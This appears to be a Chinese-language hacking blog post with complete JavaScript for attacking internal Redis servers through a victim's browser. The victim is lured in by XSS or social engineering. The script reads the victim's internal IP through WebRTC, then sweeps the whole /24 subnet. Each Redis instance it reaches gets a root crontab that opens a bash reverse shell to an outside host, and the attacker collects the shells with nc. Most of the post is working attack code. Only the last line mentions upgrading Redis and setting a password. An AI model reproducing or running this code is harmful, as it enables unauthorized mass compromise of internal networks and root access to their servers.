参考http://www.freebuf.com/articles/web/103097.html
他这个是攻击web应用的,今天实现的是利用xss或者社工让对方点我的链接,然后利用js自动化攻击内网redis,
利用redis写任务计划批量反弹shell。
js扫内网6379不太好实现,就不进行端口探测了,直接对整个网段执行一遍exp
利用如下代码获取内网ip段:- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="UTF-8" />
- <title>Document</title>
- </head>
- <body>
-
- </body>
- <script>
- ipList = []
- var webrtcxss = {
- webrtc : function(callback){
- var ip_dups = {};
- var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
- var mediaConstraints = {
- optional: [{RtpDataChannels: true}]
- };
- var servers = undefined;
- if(window.webkitRTCPeerConnection){
- servers = {iceServers: []};
- }
- var pc = new RTCPeerConnection(servers, mediaConstraints);
- pc.onicecandidate = function(ice){
- if(ice.candidate){
- var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
- var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
- if(ip_dups[ip_addr] === undefined)
- callback(ip_addr);
- ip_dups[ip_addr] = true;
- }
- };
- pc.createDataChannel("");
- pc.createOffer(function(result){
- pc.setLocalDescription(result, function(){});
- });
- },
- getIp : function(){
- this.webrtc(function(ip){
- ipList.push(ip);
- });
- }
- }
- webrtcxss.getIp()
- setTimeout(function() {
- alert(ipList)
- }, 300)
- </script>
- </html>
效果如下图
利用ajax攻击redis原理: 参考文章:http://benmmurphy.github.io/blog ... lua-sandbox-escape/ http://www.freebuf.com/articles/web/19622.html 跨域是发出数据包获取不到返回包,这里我们只管发出去不管返回,所以也不用担心跨域的问题。 下面是一个ajax操作redis写任务计划反弹的例子: - var ip = '192.168.203.2';
- var port= '6379';
- var dir = '/var/spool/cron/';
- var filename = 'root';
- var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/www.chinabaiker.com/53 0>&1';
- var url = "http://" + ip + ":" + port;
- var cmd = new XMLHttpRequest();
- cmd.open("POST", url);
- cmd.send('eval \'' + 'redis.call("set", "hacked", "\\r\\n\\n'+content+'\\n\\n\\n\\n"); redis.call("config", "set", "dir", "' + dir + '/"); redis.call("config", "set", "dbfilename", "'+filename+'"); ' + '\' 0' + "\r\n");
-
- var cmd = new XMLHttpRequest();
- cmd.open("POST", url);
- cmd.send('save\r\n');
复制代码最后来实现自动获取内网ip,自动批量攻击内网1-255的ip - <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="UTF-8" />
- <title>Document</title>
- </head>
- <body>
-
- </body>
- <script>
- ipList = []
- var webrtcxss = {
- webrtc : function(callback){
- var ip_dups = {};
- var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
- var mediaConstraints = {
- optional: [{RtpDataChannels: true}]
- };
- var servers = undefined;
- if(window.webkitRTCPeerConnection){
- servers = {iceServers: []};
- }
- var pc = new RTCPeerConnection(servers, mediaConstraints);
- pc.onicecandidate = function(ice){
- if(ice.candidate){
- var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
- var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
- if(ip_dups[ip_addr] === undefined)
- callback(ip_addr);
- ip_dups[ip_addr] = true;
- }
- };
- pc.createDataChannel("");
- pc.createOffer(function(result){
- pc.setLocalDescription(result, function(){});
- });
- },
- getIp : function(){
- this.webrtc(function(ip){
- ipList.push(ip);
- });
- }
- }
- webrtcxss.getIp()
- setTimeout(function() {
- for(var i in ipList) {
- if(ipList[i]) {
- var iparr = ipList[i].split(".");
- for(var i=0;i<255;i++) {
- var attkip = iparr [0] + "." + iparr [1] + "." + iparr [2] + "." + i;
- send(attkip);
- }
- }
- }
- }, 300);
- function send(ip) {
- var port= '6379';
- var dir = '/var/spool/cron/';
- var filename = 'root';
- var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/www.chinabaiker.com/53 0>&1';
- var url = "http://" + ip + ":" + port;
- var cmd = new XMLHttpRequest();
- cmd.open("POST", url);
- cmd.send('eval \'' + 'redis.call("set", "hacked", "\\r\\n\\n'+content+'\\n\\n\\n\\n"); redis.call("config", "set", "dir", "' + dir + '/"); redis.call("config", "set", "dbfilename", "'+filename+'"); ' + '\' 0' + "\r\n");
-
- var cmd = new XMLHttpRequest();
- cmd.open("POST", url);
- cmd.send('save\r\n');
-
- }
- </script>
- </html>
如果觉得 1-255 的范围不够,可以再加一层 for 循环。
自动向内网redis发送攻击代码 然后在自己的服务器中用nc监听你设置的端口,然后你会发现服务器已经躺在这了
Redis 太不安全了,就算只绑定 127.0.0.1 也不安全。最好升级到最新版本,然后设置密码。